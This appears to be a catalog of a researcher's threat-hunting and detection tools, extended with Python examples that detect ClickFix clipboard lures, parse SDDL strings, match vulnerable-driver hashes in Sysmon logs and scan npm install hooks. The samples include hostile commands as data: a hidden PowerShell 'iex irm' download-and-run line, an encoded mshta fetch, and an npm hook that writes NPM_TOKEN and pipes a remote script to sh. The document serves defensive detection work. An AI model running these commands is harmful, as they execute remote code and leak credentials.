Tools, modules, and field-ready utilities for threat hunting, detection engineering, and security operations.

ClickGrab
Finding ClickFix and FakeCAPTCHA like it's 1999. Detection and hunting tools for clipboard hijacking attacks.
Install: Visit https://mhaggis.github.io/ClickGrab/ or git clone https://github.com/MHaggis/ClickGrab.git
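The ClickFix pattern ClickGrab hunts for has two halves: a page that writes to the clipboard, and a planted string that is really a command the victim is told to paste into Win+R or a terminal. The following is an added example, not ClickGrab's own code: it scans a page's scripts and inline handlers for the clipboard primitives, pulls out string literals, decodes any base64 runs (PowerShell's -enc takes UTF-16LE), and only calls the page ClickFix when both halves are present. The two sample pages, the example.invalid URLs and the indicator lists are constructed for this example.

```python
"""Added example, not ClickGrab's own code: score an HTML page for the ClickFix /
fake-CAPTCHA pattern and recover the command it stages on the clipboard.
The sample pages below are constructed for this example."""
import base64
import re

# Browser primitives a lure uses to plant the command on the clipboard.
CLIPBOARD_PATTERNS = [
    r"navigator\.clipboard\.writeText\s*\(",
    r"document\.execCommand\s*\(\s*['\"]copy['\"]\s*\)",
    r"clipboardData\.setData\s*\(",
]
# What the planted text tends to contain: a LOLBin, a downloader, hidden-window
# and encoded-command switches, a URL, or the "verification" social engineering.
PAYLOAD_INDICATORS = [
    r"\bpowershell(\.exe)?\b", r"\bmshta(\.exe)?\b", r"\bcmd(\.exe)?\b",
    r"\bcurl\b", r"\bcertutil\b", r"\bbitsadmin\b",
    r"\biex\b|invoke-expression|\birm\b", r"-enc(odedcommand)?\b|-e\b",
    r"-w(indowstyle)?\s+hidden", r"-nop\b|-noprofile\b", r"https?://",
    r"verification id|i am not a robot|captcha",
]
# "..."  '...'  `...`  with escaped quotes allowed inside.
STRING_LITERAL = re.compile(
    r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'|`((?:[^`\\]|\\.)*)`')
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_blobs(text: str) -> list:
    """Decode base64 runs inside text; powershell -enc uses UTF-16LE, so try that first."""
    out = []
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                plain = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if plain.isprintable() and len(plain) >= 4:
                out.append(plain)
                break
    return out


def analyze_page(html: str) -> dict:
    """Return clipboard-API hits, candidate staged commands, and a verdict."""
    scripts = re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I)
    # Inline handlers (onclick="...") stage commands too; strip their outer quotes.
    handlers = [h[1:-1] for h in re.findall(r"\son\w+\s*=\s*(\"[^\"]*\"|'[^']*')", html, re.I)]
    js = "\n".join(scripts + handlers)
    clipboard = [p for p in CLIPBOARD_PATTERNS if re.search(p, js, re.I)]
    payloads = []
    for a, b, c in STRING_LITERAL.findall(js):
        lit = a or b or c
        if not lit:
            continue
        decoded = decode_blobs(lit)
        haystack = " ".join([lit] + decoded)
        hits = [p for p in PAYLOAD_INDICATORS if re.search(p, haystack, re.I)]
        if hits:
            payloads.append({"text": lit, "decoded": decoded, "indicators": hits})
    # Verdict needs both halves: a clipboard write AND a command-looking string.
    strong = any(len(p["indicators"]) >= 2 for p in payloads)
    return {"clipboard_api": clipboard, "payloads": payloads,
            "clickfix": bool(clipboard) and strong}


# Constructed sample 1: plain-text command staged from a <script>.
SAMPLE_LURE = r"""<html><body>
<div class="box">Verify you are human: I'm not a robot</div>
<script>
function verify() {
  var cmd = "powershell -w hidden -nop -c \"iex (irm https://example.invalid/v)\"";
  navigator.clipboard.writeText(cmd);
  alert("Press Win+R, then Ctrl+V, then Enter to finish verification");
}
</script></body></html>"""

# Constructed sample 2: command hidden behind powershell -enc in an inline handler.
_ENC = base64.b64encode("mshta https://example.invalid/x.hta".encode("utf-16-le")).decode()
SAMPLE_ENCODED = ('<html><body><button onclick="navigator.clipboard.writeText('
                  "'powershell -enc " + _ENC + "')\">I am not a robot</button></body></html>")

if __name__ == "__main__":
    for page in (SAMPLE_LURE, SAMPLE_ENCODED):
        r = analyze_page(page)
        print(r["clickfix"], [p["decoded"] or p["text"] for p in r["payloads"]])
```

The verdict is deliberately an AND: plenty of legitimate pages call navigator.clipboard.writeText, and plenty of pages mention powershell, so either signal alone is noise. Real lures also build the command by concatenation or from a fetched blob, which literal extraction misses; for those, the page's outbound requests and the final clipboard contents (what ClickGrab captures at runtime) are the better evidence.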
Note: the one-liners below chain steps with &&, which needs PowerShell 7+ (or a POSIX shell); in Windows PowerShell 5.1 run each step on its own line.

NEBULA
Interactive PowerShell framework for testing WMI, COM, LOLBAS, and persistence techniques. Built for red team testing and defense validation.
Install: git clone https://github.com/MHaggis/NEBULA.git && Import-Module .\NEBULA\NEBULA.psm1 && Invoke-NEBULA

Atomics on a Friday
Weekly YouTube show exploring atomic tests, detection engineering, and security research. Live demonstrations and deep dives into attack techniques.
Subscribe at youtube.com/@atomicsonafriday

LOLDrivers
Living Off The Land Drivers - A curated list of Windows drivers used by adversaries to bypass security controls. The definitive resource for vulnerable driver detection.
Usage: curl -s https://www.loldrivers.io/api/drivers.json | jq

PowerShell-Hunter
PowerShell tools to help defenders hunt smarter, hunt harder. A collection of scripts, queries, and techniques for threat hunting using PowerShell.
Install: git clone https://github.com/MHaggis/PowerShell-Hunter.git && cd PowerShell-Hunter && Import-Module .\PSHunter.psm1

sysmon-dfir
Sources, configuration and how to detect evil things utilizing Microsoft Sysmon. A comprehensive collection of Sysmon configurations, documentation, and detection resources.
Install: git clone https://github.com/MHaggis/sysmon-dfir.git && sysmon64.exe -accepteula -i sysmon-dfir\sysmonconfig.xml
(The Sysmon step installs a driver, so run it from an elevated prompt with sysmon64.exe on the PATH.)

LOLRMM
Living Off The Land Remote Monitoring & Management - A curated list of RMM tools abused by adversaries for persistence and lateral movement.
Visit https://lolrmm.io/ to explore RMM tools and detection strategies

CBR-Queries
Collection of useful, up-to-date Carbon Black Response queries for threat hunting and detection.
Install: git clone https://github.com/MHaggis/CBR-Queries.git

Bootloaders
A curated list of known malicious bootloaders for various operating systems. Track and catalog bootloader threats with detection rules and hash prevention.
Usage: curl -s https://www.bootloaders.io/api/bootloaders.json | jq

ShellSweep
ShellSweeping the evil. PowerShell/Python/Lua tool to detect potential web shells using entropy analysis, machine learning, and YARA rules.
Install: git clone https://github.com/splunk/ShellSweep.git && .\ShellSweep\ShellSweep.ps1

ASRGEN
ASR Configurator, Essentials and Atomic Testing. Configure and test Attack Surface Reduction rules.
Install: Visit https://asrgen.streamlit.app/ or git clone https://github.com/MHaggis/ASRGEN.git

SequelEyes
SQL, IIS, Oh My... Detection and hunting tools for SQL Server and IIS security.
Install: git clone https://github.com/MHaggis/SequelEyes.git && Import-Module .\SequelEyes\SequelEyes.psm1

SDDLMaker
The home of the SDDLMaker. Parse, create, and understand SDDL strings.
Install: git clone https://github.com/MHaggis/SDDLMaker.git && cd SDDLMaker && pip install -r requirements.txt

Package-Inferno
A Public Package Scanner for The Community. Scan npm packages for supply chain threats.
Install: git clone https://github.com/MHaggis/Package-Inferno.git && cd Package-Inferno && pip install -r requirements.txt

HeapLeakDetection
Heap leak detection utilities for security research and analysis.
Install: git clone https://github.com/MHaggis/HeapLeakDetection.git

NPM-Threat-Emulation
Helping defenders learn and validate npm supply-chain detections with safe atomic tests.
Install: git clone https://github.com/MHaggis/NPM-Threat-Emulation.git

hunt-detect-prevent
Lists of sources and utilities utilized to hunt, detect and prevent evildoers. A curated collection of security resources.
Install: git clone https://github.com/MHaggis/hunt-detect-prevent.git

AppLockerGen
AppLocker Policy Generator. Create and manage AppLocker policies programmatically.
Install: Visit https://applockergen.streamlit.app/ or git clone https://github.com/MHaggis/AppLockerGen.git

MSIXBuilder
MSIX Building Made Easy for Defenders. Create MSIX packages for testing and analysis.
Install: git clone https://github.com/MHaggis/MSIXBuilder.git && Import-Module .\MSIXBuilder\MSIXBuilder.psm1

notes
Full of public notes and utilities. A collection of technical notes, scripts, and security research documentation.
Install: git clone https://github.com/MHaggis/notes.git

Sysmon App for Splunk
A Splunk app for visualizing and analyzing Sysmon data. Dashboards and saved searches for effective Sysmon analysis.
Install: Download the app package and install via Splunk > Apps > Install from File

AtomicLua
A combination of OffensiveLua and Learning Lua - By Defenders, for Defenders.
Install: git clone https://github.com/MHaggis/AtomicLua.git

sigZap
SigZap is a Streamlit application designed to facilitate the search across multiple network signature sets at once.
Install: git clone https://github.com/MHaggis/sigZap.git && cd sigZap && pip install -r requirements.txt && streamlit run app.py

LLM
LLM tools and toys for security research and experimentation.
Install: git clone https://github.com/MHaggis/LLM.git
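For the SDDLMaker entry above ("parse, create, and understand SDDL strings"), here is an added example of the parsing half, not SDDLMaker's own code: it splits an SDDL string into O:/G:/D:/S: components, expands the two-letter SID, ACE-type, flag and rights aliases, and then flags allow ACEs that hand write-class rights to broad trustees. The alias tables cover the common codes only, and the sample SDDL strings and the name risky_aces are constructed for this example.

```python
"""Added example, not SDDLMaker's code: parse an SDDL string into owner, group
and ACEs, expanding the two-letter aliases, then flag ACEs that hand write-class
rights to broad trustees. Sample SDDL strings are constructed."""
import re

SID_ALIASES = {
    "BA": "Built-in Administrators", "BU": "Built-in Users", "SY": "Local System",
    "WD": "Everyone", "AU": "Authenticated Users", "AN": "Anonymous",
    "IU": "Interactive Users", "CO": "Creator Owner", "LS": "Local Service",
    "NS": "Network Service", "DA": "Domain Admins", "DU": "Domain Users",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "OA": "OBJECT_ACCESS_ALLOWED",
             "OD": "OBJECT_ACCESS_DENIED", "AU": "SYSTEM_AUDIT", "AL": "SYSTEM_ALARM"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS",
             "FA": "FAILED_ACCESS"}
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS", "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ",
    "FW": "FILE_GENERIC_WRITE", "FX": "FILE_GENERIC_EXECUTE", "KA": "KEY_ALL_ACCESS",
    "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE",
}
ACL_FLAGS = {"AR": "AUTO_INHERIT_REQ", "AI": "AUTO_INHERITED"}
# Write-class rights as alias names and as access-mask bits (GA, GW, WRITE_DAC,
# WRITE_OWNER, DELETE, FILE_WRITE_DATA, FILE_APPEND_DATA) for the risk check.
WRITE_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER", "DELETE",
                "FILE_ALL_ACCESS", "FILE_GENERIC_WRITE", "KEY_ALL_ACCESS", "KEY_WRITE"}
WRITE_MASK = 0x10000000 | 0x40000000 | 0x00040000 | 0x00080000 | 0x00010000 | 0x2 | 0x4
BROAD_TRUSTEES = {"Everyone", "Authenticated Users", "Built-in Users", "Anonymous",
                  "Interactive Users"}


def pairs(codes: str, table: dict) -> list:
    """Expand a run of two-letter codes ('OICI'); unknown codes pass through."""
    return [table.get(codes[i:i + 2], codes[i:i + 2]) for i in range(0, len(codes), 2)]


def parse_rights(field: str):
    """Rights are either a hex access mask or concatenated two-letter aliases."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    return pairs(field, RIGHTS)


def parse_acl(body: str) -> dict:
    """body is like 'PAI(A;;FA;;;BA)(A;OICI;0x1200a9;;;BU)'; P is the one-letter flag."""
    flags = body.split("(", 1)[0]
    out_flags = (["PROTECTED"] if flags.startswith("P") else []) + pairs(flags.lstrip("P"), ACL_FLAGS)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", body):
        parts = ace.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE ({ace})")
        t, f, r, og, iog, sid = parts
        aces.append({"type": ACE_TYPES.get(t, t), "flags": pairs(f, ACE_FLAGS),
                     "rights": parse_rights(r), "object_guid": og or None,
                     "inherit_object_guid": iog or None,
                     "trustee": SID_ALIASES.get(sid, sid)})   # raw S-1-... passes through
    return {"flags": out_flags, "aces": aces}


def parse_sddl(sddl: str) -> dict:
    """Split O:/G:/D:/S: components; each runs until the next component tag."""
    out = {}
    for tag, body in re.findall(r"([OGDS]):((?:(?![OGDS]:).)*)", sddl):
        key = {"O": "owner", "G": "group", "D": "dacl", "S": "sacl"}[tag]
        out[key] = parse_acl(body) if tag in "DS" else SID_ALIASES.get(body, body)
    return out


def risky_aces(parsed: dict) -> list:
    """Allow ACEs in the DACL that give write-class rights to broad trustees."""
    hits = []
    for ace in parsed.get("dacl", {}).get("aces", []):
        if ace["type"] != "ACCESS_ALLOWED" or ace["trustee"] not in BROAD_TRUSTEES:
            continue
        r = ace["rights"]
        if (isinstance(r, int) and r & WRITE_MASK) or (isinstance(r, list) and WRITE_RIGHTS & set(r)):
            hits.append(ace)
    return hits


if __name__ == "__main__":
    sample = "O:BAG:SYD:PAI(A;;FA;;;BA)(A;OICI;0x1200a9;;;BU)(D;;WD;;;AN)S:(AU;SA;WD;;;WD)"
    parsed = parse_sddl(sample)
    for ace in parsed["dacl"]["aces"]:
        print(ace["type"], ace["trustee"], ace["rights"])
    print("risky:", [a["trustee"] for a in risky_aces(parsed)])
```

One thing the expansion makes visible: the same two letters mean different things in different fields. WD is WRITE_DAC in the rights field but Everyone in the trustee field, and AU is SYSTEM_AUDIT as an ACE type but Authenticated Users as a trustee, which is exactly why a raw SDDL string is easy to misread and why a hex mask such as 0x1200a9 (read and execute) needs bit-level checking rather than a string match.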
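The LOLDrivers and Bootloaders entries above both expose their lists as JSON (the curl | jq one-liners), and the obvious hunt is to match those hashes against what actually loaded on your hosts. The following is an added example, not loldrivers.io's or bootloaders.io's code: it indexes a feed by every sample hash it lists and matches Sysmon DriverLoad events (Event ID 6) against it. The feed layout used here (KnownVulnerableSamples[] entries carrying SHA256/SHA1/MD5) is assumed from drivers.json rather than verified; pointing the same code at bootloaders.json only works if its records carry the same keys. The feed and the event lines are constructed samples.

```python
"""Added example, not loldrivers.io's or bootloaders.io's code: index a
LOLDrivers-style feed by hash and match Sysmon DriverLoad events (Event ID 6)
against it. Feed layout (KnownVulnerableSamples[].SHA256/SHA1/MD5) is assumed
from drivers.json; the feed and the events below are constructed samples."""
import json
import re

# Constructed feed in the assumed drivers.json shape (two entries).
SAMPLE_FEED = json.dumps([
    {"Id": "00000000-0000-0000-0000-000000000001", "Category": "vulnerable driver",
     "Tags": ["exampledrv.sys"],
     "KnownVulnerableSamples": [{"Filename": "exampledrv.sys", "SHA256": "aa" * 32,
                                 "SHA1": "bb" * 20, "MD5": "cc" * 16}]},
    {"Id": "00000000-0000-0000-0000-000000000002", "Category": "malicious",
     "Tags": ["evilboot.sys"],
     "KnownVulnerableSamples": [{"Filename": "evilboot.sys", "SHA256": "dd" * 32}]},
])

# Constructed Sysmon Event ID 6 records, flattened to "Field: value|Field: value".
# Sysmon writes Hashes as "ALG=hex,ALG=hex" using the algorithms in its config.
SAMPLE_EVENTS = [
    "ImageLoaded: C:\\Windows\\System32\\drivers\\exampledrv.sys|Hashes: SHA256="
    + "AA" * 32 + ",IMPHASH=0123456789ABCDEF|Signed: true|Signature: Example Corp",
    "ImageLoaded: C:\\Windows\\System32\\drivers\\tcpip.sys|Hashes: SHA256="
    + "ee" * 32 + "|Signed: true|Signature: Microsoft Windows",
    "ImageLoaded: C:\\Users\\Public\\evilboot.sys|Hashes: MD5=" + "ff" * 16
    + ",SHA256=" + "dd" * 32 + "|Signed: false|Signature: -",
]
HASH_ALGOS = ("SHA256", "SHA1", "MD5")


def build_index(feed_json: str) -> dict:
    """Map every listed sample hash (lowercased) to the feed entry it belongs to."""
    index = {}
    for entry in json.loads(feed_json):
        for sample in entry.get("KnownVulnerableSamples", []):
            for algo in HASH_ALGOS:
                h = sample.get(algo)
                if h:
                    index[h.lower()] = {"id": entry["Id"],
                                        "category": entry.get("Category", ""),
                                        "filename": sample.get("Filename", "")}
    return index


def parse_hashes(field: str) -> dict:
    """'SHA256=..,IMPHASH=..' -> {'SHA256': '..', 'IMPHASH': '..'} with hex lowercased."""
    return {k.upper(): v.lower() for k, v in re.findall(r"(\w+)=([0-9A-Fa-f]+)", field)}


def parse_event(line: str) -> dict:
    """Split the flattened record into fields and normalise the Hashes field."""
    fields = dict(part.split(": ", 1) for part in line.split("|"))
    fields["Hashes"] = parse_hashes(fields.get("Hashes", ""))
    return fields


def hunt(events, index: dict) -> list:
    """One hit per event whose loaded image hashes to a feed sample, any algorithm."""
    hits = []
    for line in events:
        ev = parse_event(line)
        for algo, h in ev["Hashes"].items():
            if h in index:
                hits.append({"image": ev["ImageLoaded"], "algo": algo,
                             "signed": ev.get("Signed"), **index[h]})
                break
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS, build_index(SAMPLE_FEED)):
        print(f"{hit['category']}: {hit['image']} ({hit['algo']}, signed={hit['signed']}, feed id {hit['id']})")
```

Two points the sample is built to show: the first hit is a validly signed driver, because bring-your-own-vulnerable-driver attacks rely on the signature being good, so "Signed: true" is not a reason to drop the alert; and the match is case-insensitive on the hex because Sysmon emits uppercase while feeds vary. A hash match only catches the exact builds the feed lists, so make sure your Sysmon config actually records SHA256 for DriverLoad and treat a miss as "unknown", not "clean".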
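For the Package-Inferno and NPM-Threat-Emulation entries above (scanning npm packages for supply-chain threats, and validating the detections with atomic tests), here is an added example of the core check, not either project's code: npm runs the preinstall/install/postinstall/prepare hooks in package.json without the installing user asking, so those scripts are where downloaders and token stealers hide. The scanner below pulls those hooks out and scores them against a small indicator list; the indicator list, the scoring threshold and both sample manifests (using the 203.0.113.0/24 documentation range) are constructed for this example.

```python
"""Added example, not Package-Inferno's or NPM-Threat-Emulation's code: scan a
package.json for lifecycle scripts npm runs at install time and score them for
the indicators a downloader or token-stealing hook usually carries. Both
manifests below are constructed samples."""
import json
import re

# Hooks npm executes without the installing user asking for them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b|\bInvoke-WebRequest\b|\biwr\b", "network download"),
    (r"\bnode\s+-e\b|\beval\(|new Function\(", "inline code execution"),
    (r"\bbase64\b|\batob\(|Buffer\.from\([^)]*['\"]base64", "base64 decoding"),
    (r"\$\{?(NPM_TOKEN|NODE_AUTH_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY)\b", "credential env var"),
    (r"~/\.npmrc|\.ssh/|\.aws/credentials", "credential file access"),
    (r"\bsh\s+-c\b|\bbash\s+-c\b|\bpowershell\b|\bcmd\s*/c\b", "shell spawn"),
    (r"\|\s*(sh|bash)\b", "pipe to shell"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "raw IP URL"),
]


def scan_manifest(manifest: str) -> dict:
    """Return the install-time hooks, their indicators, and a risk verdict."""
    pkg = json.loads(manifest)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        tags = [label for pat, label in SUSPICIOUS if re.search(pat, cmd, re.I)]
        findings.append({"hook": hook, "command": cmd, "indicators": tags})
    score = sum(len(f["indicators"]) for f in findings)
    # Any credential touch is enough on its own; otherwise require two signals,
    # because a lone "curl" or "node -e" also shows up in benign build steps.
    cred = any(t.startswith("credential") for f in findings for t in f["indicators"])
    return {"name": pkg.get("name"), "version": pkg.get("version"),
            "install_hooks": findings, "score": score, "risky": cred or score >= 2}


# Constructed benign manifest: a native build step on postinstall is normal.
BENIGN = json.dumps({"name": "native-pad", "version": "1.0.0",
                     "scripts": {"test": "node test.js", "postinstall": "node-gyp rebuild"}})
# Constructed malicious follow-up release: token exfil plus a piped downloader.
EVIL = r'''{
  "name": "native-pad", "version": "1.0.1",
  "scripts": {
    "preinstall": "echo $NPM_TOKEN > /tmp/.t",
    "postinstall": "node -e \"require('child_process').exec('curl -s http://203.0.113.10/i.sh | sh')\""
  }
}'''

if __name__ == "__main__":
    for m in (BENIGN, EVIL):
        r = scan_manifest(m)
        print(r["name"], r["version"], "RISKY" if r["risky"] else "ok", r["score"],
              [(f["hook"], f["indicators"]) for f in r["install_hooks"]])
```

Running this against the published tarball's package.json (npm pack, or the registry's manifest endpoint) rather than the repository's is the point: the two can differ, and a hook that exists only in the published copy is itself a strong signal. It is also the kind of check the NPM-Threat-Emulation atomic tests are meant to exercise, so a detection that fires on the constructed EVIL manifest here but not on the BENIGN one is the expected result.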